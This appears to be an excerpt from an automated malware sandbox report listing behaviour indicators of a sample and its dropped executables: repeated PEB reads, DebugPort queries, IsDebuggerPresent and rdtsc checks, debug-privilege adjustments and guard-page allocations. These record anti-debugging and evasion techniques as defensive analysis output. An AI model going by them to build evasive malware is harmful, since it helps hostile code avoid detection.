Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB69100 mov eax, dword ptr fs:[00000030h]	20_2_6AB69100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB69100 mov eax, dword ptr fs:[00000030h]	20_2_6AB69100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB70100 mov eax, dword ptr fs:[00000030h]	20_2_6AB70100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB70100 mov eax, dword ptr fs:[00000030h]	20_2_6AB70100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB70100 mov eax, dword ptr fs:[00000030h]	20_2_6AB70100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6B171 mov eax, dword ptr fs:[00000030h]	20_2_6AB6B171
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6B171 mov eax, dword ptr fs:[00000030h]	20_2_6AB6B171
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6395E mov eax, dword ptr fs:[00000030h]	20_2_6AB6395E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6395E mov eax, dword ptr fs:[00000030h]	20_2_6AB6395E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8B944 mov eax, dword ptr fs:[00000030h]	20_2_6AB8B944
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8B944 mov eax, dword ptr fs:[00000030h]	20_2_6AB8B944
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38ED6 mov eax, dword ptr fs:[00000030h]	20_2_6AC38ED6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE46A7 mov eax, dword ptr fs:[00000030h]	20_2_6ABE46A7
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF2EA3 mov eax, dword ptr fs:[00000030h]	20_2_6ABF2EA3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9DE9E mov eax, dword ptr fs:[00000030h]	20_2_6AB9DE9E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9DE9E mov eax, dword ptr fs:[00000030h]	20_2_6AB9DE9E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9DE9E mov eax, dword ptr fs:[00000030h]	20_2_6AB9DE9E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB63E80 mov eax, dword ptr fs:[00000030h]	20_2_6AB63E80
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB63E80 mov eax, dword ptr fs:[00000030h]	20_2_6AB63E80
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB776E2 mov eax, dword ptr fs:[00000030h]	20_2_6AB776E2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB916E0 mov ecx, dword ptr fs:[00000030h]	20_2_6AB916E0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA3EE4 mov eax, dword ptr fs:[00000030h]	20_2_6ABA3EE4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA3EE4 mov eax, dword ptr fs:[00000030h]	20_2_6ABA3EE4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA3EE4 mov eax, dword ptr fs:[00000030h]	20_2_6ABA3EE4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB936CC mov eax, dword ptr fs:[00000030h]	20_2_6AB936CC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6A63B mov eax, dword ptr fs:[00000030h]	20_2_6AB6A63B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6A63B mov eax, dword ptr fs:[00000030h]	20_2_6AB6A63B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA0E21 mov eax, dword ptr fs:[00000030h]	20_2_6ABA0E21
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h]	20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h]	20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h]	20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h]	20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h]	20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h]	20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h]	20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h]	20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h]	20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF2E14 mov eax, dword ptr fs:[00000030h]	20_2_6ABF2E14
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6C600 mov eax, dword ptr fs:[00000030h]	20_2_6AB6C600
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6C600 mov eax, dword ptr fs:[00000030h]	20_2_6AB6C600
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6C600 mov eax, dword ptr fs:[00000030h]	20_2_6AB6C600
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB93E70 mov eax, dword ptr fs:[00000030h]	20_2_6AB93E70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC1FE3F mov eax, dword ptr fs:[00000030h]	20_2_6AC1FE3F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA37F5 mov eax, dword ptr fs:[00000030h]	20_2_6ABA37F5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h]	20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h]	20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h]	20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h]	20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h]	20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h]	20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h]	20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB63FC5 mov eax, dword ptr fs:[00000030h]	20_2_6AB63FC5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB63FC5 mov eax, dword ptr fs:[00000030h]	20_2_6AB63FC5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB63FC5 mov eax, dword ptr fs:[00000030h]	20_2_6AB63FC5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8B73D mov eax, dword ptr fs:[00000030h]	20_2_6AB8B73D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8B73D mov eax, dword ptr fs:[00000030h]	20_2_6AB8B73D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB66730 mov eax, dword ptr fs:[00000030h]	20_2_6AB66730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB66730 mov eax, dword ptr fs:[00000030h]	20_2_6AB66730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB66730 mov eax, dword ptr fs:[00000030h]	20_2_6AB66730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9E730 mov eax, dword ptr fs:[00000030h]	20_2_6AB9E730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB64F2E mov eax, dword ptr fs:[00000030h]	20_2_6AB64F2E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB64F2E mov eax, dword ptr fs:[00000030h]	20_2_6AB64F2E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38F6A mov eax, dword ptr fs:[00000030h]	20_2_6AC38F6A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB94710 mov eax, dword ptr fs:[00000030h]	20_2_6AB94710
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8F716 mov eax, dword ptr fs:[00000030h]	20_2_6AB8F716
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABFFF10 mov eax, dword ptr fs:[00000030h]	20_2_6ABFFF10
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABFFF10 mov eax, dword ptr fs:[00000030h]	20_2_6ABFFF10
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h]	20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h]	20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h]	20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h]	20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h]	20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h]	20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h]	20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8E760 mov eax, dword ptr fs:[00000030h]	20_2_6AB8E760
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8E760 mov eax, dword ptr fs:[00000030h]	20_2_6AB8E760
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6A745 mov eax, dword ptr fs:[00000030h]	20_2_6AB6A745
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9DF4C mov eax, dword ptr fs:[00000030h]	20_2_6AB9DF4C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB64CB0 mov eax, dword ptr fs:[00000030h]	20_2_6AB64CB0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38CD6 mov eax, dword ptr fs:[00000030h]	20_2_6AC38CD6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6649B mov eax, dword ptr fs:[00000030h]	20_2_6AB6649B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6649B mov eax, dword ptr fs:[00000030h]	20_2_6AB6649B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB61480 mov eax, dword ptr fs:[00000030h]	20_2_6AB61480
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC214FB mov eax, dword ptr fs:[00000030h]	20_2_6AC214FB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h]	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h]	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h]	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h]	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h]	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h]	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h]	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h]	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h]	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h]	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h]	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h]	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h]	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB62CDB mov eax, dword ptr fs:[00000030h]	20_2_6AB62CDB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC39CB3 mov eax, dword ptr fs:[00000030h]	20_2_6AC39CB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB64439 mov eax, dword ptr fs:[00000030h]	20_2_6AB64439
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38450 mov eax, dword ptr fs:[00000030h]	20_2_6AC38450
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9BC2C mov eax, dword ptr fs:[00000030h]	20_2_6AB9BC2C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38C75 mov eax, dword ptr fs:[00000030h]	20_2_6AC38C75
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7FC01 mov eax, dword ptr fs:[00000030h]	20_2_6AB7FC01
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7FC01 mov eax, dword ptr fs:[00000030h]	20_2_6AB7FC01
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7FC01 mov eax, dword ptr fs:[00000030h]	20_2_6AB7FC01
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7FC01 mov eax, dword ptr fs:[00000030h]	20_2_6AB7FC01
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7FC77 mov eax, dword ptr fs:[00000030h]	20_2_6AB7FC77
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7FC77 mov eax, dword ptr fs:[00000030h]	20_2_6AB7FC77
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7FC77 mov eax, dword ptr fs:[00000030h]	20_2_6AB7FC77
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7FC77 mov eax, dword ptr fs:[00000030h]	20_2_6AB7FC77
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h]	20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h]	20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h]	20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h]	20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h]	20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h]	20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h]	20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h]	20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h]	20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h]	20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h]	20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h]	20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA5C70 mov eax, dword ptr fs:[00000030h]	20_2_6ABA5C70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC3740D mov eax, dword ptr fs:[00000030h]	20_2_6AC3740D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC3740D mov eax, dword ptr fs:[00000030h]	20_2_6AC3740D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC3740D mov eax, dword ptr fs:[00000030h]	20_2_6AC3740D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8746D mov eax, dword ptr fs:[00000030h]	20_2_6AB8746D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38C14 mov eax, dword ptr fs:[00000030h]	20_2_6AC38C14
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABFC450 mov eax, dword ptr fs:[00000030h]	20_2_6ABFC450
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABFC450 mov eax, dword ptr fs:[00000030h]	20_2_6ABFC450
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB91DB5 mov eax, dword ptr fs:[00000030h]	20_2_6AB91DB5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB91DB5 mov eax, dword ptr fs:[00000030h]	20_2_6AB91DB5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB91DB5 mov eax, dword ptr fs:[00000030h]	20_2_6AB91DB5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB935A1 mov eax, dword ptr fs:[00000030h]	20_2_6AB935A1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB63591 mov eax, dword ptr fs:[00000030h]	20_2_6AB63591
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC18DF1 mov eax, dword ptr fs:[00000030h]	20_2_6AC18DF1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB695F0 mov eax, dword ptr fs:[00000030h]	20_2_6AB695F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB695F0 mov ecx, dword ptr fs:[00000030h]	20_2_6AB695F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB995EC mov eax, dword ptr fs:[00000030h]	20_2_6AB995EC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB615C1 mov eax, dword ptr fs:[00000030h]	20_2_6AB615C1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC13D40 mov eax, dword ptr fs:[00000030h]	20_2_6AC13D40
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB94D3B mov eax, dword ptr fs:[00000030h]	20_2_6AB94D3B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB94D3B mov eax, dword ptr fs:[00000030h]	20_2_6AB94D3B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB94D3B mov eax, dword ptr fs:[00000030h]	20_2_6AB94D3B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6AD30 mov eax, dword ptr fs:[00000030h]	20_2_6AB6AD30
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h]	20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h]	20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h]	20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h]	20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h]	20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6F51D mov eax, dword ptr fs:[00000030h]	20_2_6AB6F51D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8C577 mov eax, dword ptr fs:[00000030h]	20_2_6AB8C577
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8C577 mov eax, dword ptr fs:[00000030h]	20_2_6AB8C577
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB87D50 mov eax, dword ptr fs:[00000030h]	20_2_6AB87D50
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38D34 mov eax, dword ptr fs:[00000030h]	20_2_6AC38D34
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA3D43 mov eax, dword ptr fs:[00000030h]	20_2_6ABA3D43
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6354C mov eax, dword ptr fs:[00000030h]	20_2_6AB6354C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6354C mov eax, dword ptr fs:[00000030h]	20_2_6AB6354C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE3540 mov eax, dword ptr fs:[00000030h]	20_2_6ABE3540
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Code function: 24_2_02C30D90 mov eax, dword ptr fs:[00000030h]	24_2_02C30D90
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Code function: 24_2_02C3092B mov eax, dword ptr fs:[00000030h]	24_2_02C3092B

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\iwbavbe	Process queried: DebugPort

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe

Code function: 0_2_00426440 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00426440

Source: C:\Users\user\AppData\Local\Temp\20BD.exe

Code function: 20_2_6AB96B90 rdtsc

20_2_6AB96B90

Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\iwbavbe

Code function: 13_1_004026C8 LdrLoadDll,

13_1_004026C8

Source: C:\Users\user\AppData\Local\Temp\69B.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 0_2_00426440 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00426440
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 0_2_0041D1B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041D1B0
Source: C:\Users\user\AppData\Roaming\iwbavbe	Code function: 10_2_00426440 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00426440
Source: C:\Users\user\AppData\Roaming\iwbavbe	Code function: 10_2_0041D1B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_0041D1B0
